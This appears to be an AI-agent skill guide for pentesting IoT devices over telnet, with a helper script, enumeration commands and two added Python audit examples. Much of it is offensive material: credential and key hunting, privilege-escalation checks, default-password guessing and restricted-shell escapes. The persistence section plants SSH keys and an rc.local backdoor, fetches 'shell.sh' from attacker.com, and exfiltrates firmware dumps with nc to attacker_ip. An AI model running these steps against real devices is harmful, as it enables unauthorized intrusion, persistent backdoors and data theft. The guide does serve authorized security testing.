IoT Telnet Shell (telnetshell)
This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities.
Prerequisites
- Python 3 with the pexpect library (`pip install pexpect` or `sudo pacman -S python-pexpect`)
- A telnet client installed on the system (`sudo pacman -S inetutils` on Arch)
- Network access to the target device's telnet port
Recommended Approach: Telnet Helper Script
IMPORTANT: This skill includes a Python helper script (telnet_helper.py) that provides a clean, reliable interface for telnet communication. This is the RECOMMENDED method for interacting with IoT devices.
Default Session Logging
ALL commands run by Claude will be logged to /tmp/telnet_session.log by default.
To observe what Claude is doing in real-time:
```bash
# In a separate terminal, run:
tail -f /tmp/telnet_session.log
```
This allows you to watch all telnet I/O as it happens without interfering with the connection.
Why Use the Telnet Helper?
The helper script solves many problems with direct telnet usage:
- Clean output: Automatically removes command echoes, prompts, and ANSI codes
- Prompt detection: Automatically detects and waits for device prompts
- Timeout handling: Proper timeout management with no arbitrary sleeps
- Easy scripting: Simple command-line interface for single commands or batch operations
- Session logging: All I/O logged to `/tmp/telnet_session.log` for observation
- Reliable: No issues with TTY requirements or background processes
- JSON output: For programmatic parsing and tool chaining
Quick Start with Telnet Helper
Single Command:
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a"
```
Custom Port:
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --command "ls /"
```
With Custom Prompt (recommended for known devices):
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --prompt "^/ [#\$]" --command "ifconfig"
```
Interactive Mode:
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --interactive
```
Batch Commands from File:
```bash
# Create a file with commands (one per line)
echo -e "uname -a\ncat /proc/version\nifconfig\nps" > commands.txt
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --script commands.txt
```
JSON Output (for parsing):
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a" --json
```
Debug Mode:
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "ls" --debug
```
Session Logging (for observation):
```bash
# Terminal 1 - Run with logging
python3 .claude/skills/telnetshell/telnet_helper.py \
  --host 192.168.1.100 \
  --port 2222 \
  --logfile /tmp/session.log \
  --interactive

# Terminal 2 - Watch the session in real-time
tail -f /tmp/session.log
```
Note: See OBSERVING_SESSIONS.md for comprehensive guide on monitoring telnet sessions.
Telnet Helper Options
```text
Required (one of):
  --command, -c CMD        Execute a single command
  --interactive, -i        Enter interactive mode
  --script, -s FILE        Execute commands from a file

Connection Options:
  --host, -H HOST          Target host IP or hostname (required)
  --port, -P PORT          Telnet port (default: 23)
  --timeout, -t SECONDS    Command timeout (default: 3.0)
  --prompt, -p PATTERN     Custom prompt regex pattern

Output Options:
  --raw, -r                Don't clean output (show echoes, prompts)
  --json, -j               Output in JSON format
  --logfile, -l FILE       Log all I/O to file (default: /tmp/telnet_session.log)
  --debug                  Show debug information
```
Common Prompt Patterns
The helper script includes common prompt patterns, but you can specify custom ones:
```bash
# BusyBox shell (common on IoT)
--prompt "/\s*[#\$]\s*$"

# Standard root/user prompts
--prompt "^[#\$]\s*$"

# Custom device
--prompt "^MyDevice>\s*$"

# Uniview cameras
--prompt "^User@[^>]+>\s*$"
```
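The "clean output" and "prompt detection" behaviour described for the helper, and the prompt patterns listed above, can be reproduced in a few lines. The following Python is an added example, not the skill's own telnet_helper.py: the pattern list and its order, the ANSI-stripping regex, the JSON field names and the two captured sessions are all constructed here for illustration, and the real helper's internals may differ.

```python
import json
import re

# Prompt patterns from the skill page, tried in order. Keeping them in a list
# (and this order) is an assumption for this example, not the helper's own table.
DEFAULT_PROMPT_PATTERNS = [
    r"/\s*[#\$]\s*$",        # BusyBox shell: "/ # " or "/ $ "
    r"^[#\$]\s*$",           # bare root/user prompt
    r"^User@[^>]+>\s*$",     # Uniview cameras
]

# CSI escape sequences such as "\x1b[0m" (colour reset) or "\x1b[2J" (clear screen).
ANSI_ESCAPE = re.compile(r"\x1b\[[0-9;?]*[ -/]*[@-~]")


def strip_ansi(text):
    """Remove ANSI control sequences that BusyBox and vendor shells often emit."""
    return ANSI_ESCAPE.sub("", text)


def detect_prompt(line, patterns=DEFAULT_PROMPT_PATTERNS):
    """Return the first pattern that matches the line, or None if it is not a prompt."""
    for pattern in patterns:
        if re.search(pattern, line):
            return pattern
    return None


def clean_output(raw, command, patterns=DEFAULT_PROMPT_PATTERNS):
    """Reduce a raw capture to just the command's output.

    Steps: strip ANSI codes, normalise CR/LF, drop the echoed command line,
    then drop trailing blank lines and the prompt printed when the command finished.
    """
    text = strip_ansi(raw).replace("\r\n", "\n").replace("\r", "\n")
    lines = text.split("\n")
    if lines and command.strip() in lines[0]:
        lines = lines[1:]                       # echoed command, possibly preceded by a prompt
    while lines and (not lines[-1].strip() or detect_prompt(lines[-1], patterns)):
        lines.pop()                             # trailing prompt and blank lines
    return "\n".join(lines).strip()


def to_json_record(host, command, raw, patterns=DEFAULT_PROMPT_PATTERNS):
    """Build a JSON document of the kind a --json mode would emit (field names assumed)."""
    cleaned_lines = strip_ansi(raw).splitlines()
    last_line = cleaned_lines[-1] if cleaned_lines else ""
    return json.dumps({
        "host": host,
        "command": command,
        "output": clean_output(raw, command, patterns),
        "prompt_pattern": detect_prompt(last_line, patterns),
    })


# Constructed captures for demonstration; not recorded from a real device.
SAMPLE_BUSYBOX = (
    "uname -a\r\n"
    "\x1b[0mLinux ipcam 3.10.14 #1 PREEMPT Tue Oct 1 10:00:00 CST 2019 armv7l GNU/Linux\r\n"
    "/ # "
)
SAMPLE_UNIVIEW = "User@Camera>ls /\r\nbin  dev  etc  lib  proc  sys  tmp  usr  var\r\nUser@Camera>"

if __name__ == "__main__":
    print(to_json_record("192.168.1.100", "uname -a", SAMPLE_BUSYBOX))
    print(to_json_record("192.168.1.100", "ls /", SAMPLE_UNIVIEW))
```

The trailing-prompt loop is why a custom `--prompt` matters: if none of the patterns matches the device's prompt, the prompt line survives in the "clean" output and, in a real session, the reader would also wait for the full timeout instead of returning as soon as the prompt appears.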
Device Enumeration Example with Telnet Helper
Here's a complete example of safely enumerating a device:
```bash
# Set variables for convenience
HELPER="python3 .claude/skills/telnetshell/telnet_helper.py"
HOST="192.168.1.100"
PORT="2222"
LOGFILE="/tmp/telnet_session.log"

# System information
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "uname -a"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /proc/version"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /proc/cpuinfo"

# Check for BusyBox
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "busybox"

# Network configuration
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "ifconfig"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "route -n"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "netstat -tulpn"

# Process listing (may need longer timeout)
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --timeout 5 --command "ps aux"

# File system exploration
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "ls -la /"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "mount"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "df -h"

# Security assessment
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /etc/passwd"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "find / -perm -4000 2>/dev/null"
```
IMPORTANT FOR CLAUDE CODE: When using this skill, ALWAYS include --logfile /tmp/telnet_session.log in every command so the user can monitor activity with tail -f /tmp/telnet_session.log.
Instructions
1. Connection Setup
Default connection:
- Port: 23 (standard telnet, override with `--port`)
- Timeout: 3 seconds (override with `--timeout`)
- Logging: `/tmp/telnet_session.log` by default
Common telnet ports on IoT devices:
- 23: Standard telnet port
- 2222: Alternative telnet port (common on cameras)
- 8023: Alternative telnet port
- Custom ports: Check device documentation or nmap scan results
2. BusyBox Shells (Most IoT Devices)
IMPORTANT: The vast majority of IoT devices use BusyBox, a lightweight suite of Unix utilities designed for embedded systems. BusyBox provides a minimal shell environment with limited command functionality.
Identifying BusyBox:
```bash
# Check what shell you're using
busybox
busybox --help

# Or check symlinks
ls -la /bin/sh
# Often shows: /bin/sh -> /bin/busybox

# List available BusyBox applets
busybox --list
```
BusyBox Limitations:
- Many standard Linux commands may be simplified versions
- Some common flags/options may not be available
- Features like tab completion may be limited or absent
- Some exploitation techniques that work on full Linux may not work
Common BusyBox commands available:
```bash
# Core utilities (usually available)
cat, ls, cd, pwd, echo, cp, mv, rm, mkdir, chmod, chown
ps, kill, top, free, df, mount, umount
grep, find, sed, awk (limited versions)
ifconfig, route, ping, netstat, telnet
vi (basic text editor - no syntax highlighting)

# Check what's available
busybox --list | sort
ls /bin /sbin /usr/bin /usr/sbin
```
BusyBox-specific considerations for pentesting:
- ps output format may differ from standard Linux
- Some privilege escalation techniques require commands not in BusyBox
- File permissions still work the same (SUID, sticky bits, etc.)
- Networking tools are often present (telnet, wget, nc/netcat, ftpget)
- Python/Perl/Ruby are usually NOT available (device storage constraints)
Useful BusyBox commands for enumeration:
```bash
# Check BusyBox version (may have known vulnerabilities)
busybox | head -1

# Network utilities often available
nc -l -p 4444                     # Netcat listener
wget http://attacker.com/shell.sh
ftpget server file
telnet 192.168.1.1

# httpd (web server) often included
busybox httpd -p 8080 -h /tmp     # Quick file sharing
```
3. Device Enumeration
Once you have shell access, gather the following information:
System Information:
```bash
# Kernel and system info
uname -a
cat /proc/version
cat /proc/cpuinfo
cat /proc/meminfo

# Distribution/firmware info
cat /etc/issue
cat /etc/*release*
cat /etc/*version*

# Hostname and network
hostname
cat /etc/hostname
ifconfig -a
cat /etc/network/interfaces
cat /etc/resolv.conf

# Mounted filesystems
mount
cat /proc/mounts
df -h

# Running processes
ps aux
ps -ef
top -b -n 1
```
User and Permission Information:
```bash
# Current user context
id
whoami
groups

# User accounts
cat /etc/passwd
cat /etc/shadow   # If readable - major security issue!
cat /etc/group

# Sudo/privilege info
sudo -l
cat /etc/sudoers
```
Network Services:
```bash
# Listening services
netstat -tulpn
lsof -i

# Firewall rules
iptables -L -n -v
cat /etc/iptables/*
```
Interesting Files and Directories:
```bash
# Configuration files
ls -la /etc/
find /etc/ -type f -readable

# Web server configs
ls -la /etc/nginx/
ls -la /etc/apache2/
ls -la /var/www/

# Credentials and keys
find / -name "*.pem" 2>/dev/null
find / -name "*.key" 2>/dev/null
find / -name "*password*" 2>/dev/null
find / -name "*credential*" 2>/dev/null
grep -r "password" /etc/ 2>/dev/null

# SUID/SGID binaries (privilege escalation vectors)
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null

# World-writable files/directories
find / -perm -2 -type f 2>/dev/null
find / -perm -2 -type d 2>/dev/null

# Development/debugging tools
which gdb gcc python perl ruby tcpdump
ls /usr/bin/ /bin/ /sbin/ /usr/sbin/
```
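The "User and Permission Information" and "Interesting Files" steps produce raw `cat /etc/passwd` and `find / -perm -4000` output that still has to be read for findings. The following Python is an added example (not part of the skill or its enumeration scripts) that turns that output into audit findings: empty password fields, password hashes kept in the world-readable passwd file, extra UID 0 accounts, and SUID binaries sitting in world-writable directories. Both sample outputs are constructed here and are not from a real device; the list of world-writable directories is an assumption.

```python
# Constructed sample of `cat /etc/passwd` output from a BusyBox device (not real data).
SAMPLE_PASSWD = """root::0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
admin:$1$saltsalt$0123456789abcdefghijk:0:0:admin:/root:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
"""

# Constructed sample of `find / -perm -4000 -type f 2>/dev/null` output.
SAMPLE_SUID = """/bin/busybox
/usr/bin/passwd
/tmp/.helper
"""

# Directories that are normally world-writable on embedded Linux (assumed list).
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; malformed lines are skipped rather than fatal."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "home": home, "shell": shell})
    return entries


def audit_passwd(text):
    """Flag account configurations that matter on a telnet-exposed device."""
    findings = []
    for e in parse_passwd(text):
        if e["pw"] == "":
            findings.append(f"{e['name']}: empty password field, login needs no password")
        elif e["pw"] != "x" and not e["pw"].startswith(("*", "!")):
            # "x" means the hash lives in /etc/shadow; "*" or "!" means the account is locked.
            findings.append(f"{e['name']}: password hash stored in world-readable /etc/passwd")
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"{e['name']}: UID 0 account other than root")
    return findings


def audit_suid(text):
    """Flag SUID binaries that live in world-writable locations."""
    findings = []
    for path in text.split():
        if path.startswith(WORLD_WRITABLE_DIRS):
            findings.append(f"{path}: SUID binary in a world-writable directory")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) + audit_suid(SAMPLE_SUID):
        print(finding)
```

Feeding the helper's cleaned output for `cat /etc/passwd` into `audit_passwd` gives a findings list that can go straight into the session notes the Best Practices section asks for.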
4. Privilege Escalation (if not root)
Check for common vulnerabilities:
```bash
# Kernel exploits
uname -r   # Check kernel version for known exploits

# Check for exploitable services
ps aux | grep root

# Writable service files
find /etc/init.d/ -writable 2>/dev/null

# Cron jobs
crontab -l
ls -la /etc/cron*
cat /etc/crontab
```
5. Persistence and Further Access
Establish additional access methods:
```bash
# Add SSH access (if SSH is available)
mkdir -p /root/.ssh
echo "your_ssh_public_key" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chmod 700 /root/.ssh

# Start SSH service (if not running)
/etc/init.d/ssh start
# or
/etc/init.d/sshd start
# or
/etc/init.d/dropbear start   # Common on embedded devices

# Add to startup scripts
echo "/path/to/backdoor &" >> /etc/rc.local
```
Extract firmware for offline analysis:
```bash
# Find MTD partitions (common on embedded devices)
cat /proc/mtd
cat /proc/partitions

# Dump flash partitions
dd if=/dev/mtd0 of=/tmp/bootloader.bin
dd if=/dev/mtd1 of=/tmp/kernel.bin
dd if=/dev/mtd2 of=/tmp/rootfs.bin

# Copy to external storage or network
# If network is available:
nc attacker_ip 4444 < /tmp/rootfs.bin

# If HTTP server is available:
cd /tmp
busybox httpd -p 8000
# Then download from http://device_ip:8000/rootfs.bin
```
Common IoT Device Scenarios
Scenario 1: No Authentication Shell
```bash
# Connect - drops directly to root shell
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --interactive
# Enumerate and exploit
```
Scenario 2: Custom Port No-Auth Shell
```bash
# Many IoT cameras use port 2222
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --interactive
```
Scenario 3: Password-Protected Shell
```bash
# If you encounter a password prompt, the helper will detect it
# Try default credentials:
# - root/root
# - admin/admin
# - root/(empty)
# Search online for device-specific defaults
```
Scenario 4: Limited Shell Escape
```bash
# If you get a limited shell:
# Try common escape techniques:
echo $SHELL
/bin/sh
/bin/bash
vi                 # Then :!/bin/sh
less /etc/passwd   # Then !/bin/sh
find / -exec /bin/sh \;
awk 'BEGIN {system("/bin/sh")}'
```
Security Testing Checklist
Best Practices
- Always log your session: Default logfile is `/tmp/telnet_session.log`
- Document everything: Take notes on commands, responses, and findings
- Use batch scripts: Create enumeration scripts for common tasks
- Research the device: Look up known vulnerabilities, default credentials, and common issues
- Use proper authorization: Only perform pentesting on devices you own or have explicit permission to test
- Be careful with destructive commands: Avoid commands that could brick devices or corrupt data
- Monitor your session: Use `tail -f` in another terminal to watch activity
Troubleshooting
Problem: Connection refused
- Solution: Check if telnet service is running, verify port number, check firewall rules
Problem: Connection timeout
- Solution: Verify network connectivity, check if device is powered on, verify IP address
Problem: "Permission denied"
- Solution: Telnet service may require authentication, try default credentials
Problem: Commands not echoing
- Solution: Use the `--raw` flag to see unfiltered output
Problem: Garbled output or wrong prompt detection
- Solution: Use the `--prompt` flag with a custom regex pattern for your specific device
Pre-built Enumeration Scripts
The skill includes pre-built enumeration scripts for common tasks:
- `enum_system.txt`: System information gathering
- `enum_network.txt`: Network configuration enumeration
- `enum_files.txt`: File system exploration
- `enum_security.txt`: Security-focused enumeration
Usage:
```bash
python3 .claude/skills/telnetshell/telnet_helper.py \
  --host 192.168.1.100 \
  --port 2222 \
  --script .claude/skills/telnetshell/enum_system.txt
```
Example Usage
```bash
# Basic connection to standard telnet port
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a"

# Connection to custom port (common for IoT cameras)
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --command "ls /"

# Interactive session with logging
python3 .claude/skills/telnetshell/telnet_helper.py \
  --host 192.168.1.100 \
  --port 2222 \
  --logfile /tmp/camera_session.log \
  --interactive

# Batch enumeration
python3 .claude/skills/telnetshell/telnet_helper.py \
  --host 192.168.1.100 \
  --port 2222 \
  --script enum_system.txt \
  --json > results.json

# Long-running command with custom timeout
python3 .claude/skills/telnetshell/telnet_helper.py \
  --host 192.168.1.100 \
  --timeout 10 \
  --command "find / -name '*.conf'"
```
References